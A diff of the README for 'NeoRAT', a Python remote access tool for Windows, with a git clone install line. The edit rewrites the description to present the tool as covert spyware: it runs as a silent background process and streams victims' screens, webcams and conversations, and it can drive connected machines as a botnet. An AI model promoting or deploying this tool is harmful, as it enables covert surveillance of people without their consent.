5l1v3r1/NeoRAT/README.md

 ## Neo
-Free, open-source remote access tool with botnet functionality for Windows.
+Free, open-source remote access tool for Windows.

 ## Description
-Neo is an open-source TCP application protocol used to control multiple computers transfering requested data over to the server without interference by the client user.
-Supporting large amount of features with a whide range of options.
-Neo demonstrates the possibilities of python used in conjunction with other open-source projects.
+Neo is a command to control server, accepting clients to connect, when connected you have the freedom to do anything & everything without the interference of suspicious windows, as a silent background process with the only intention being to serve whatever data requested, this can be a live feed of the clients desktop screen, webcam or listening in to their conversations.
+Neo can also be used as a botnet, running threaded custom scripts on every connected client simultaneously.

 ## Installation
 * git clone https://github.com/Alvin-22/Neo.git && cd Neo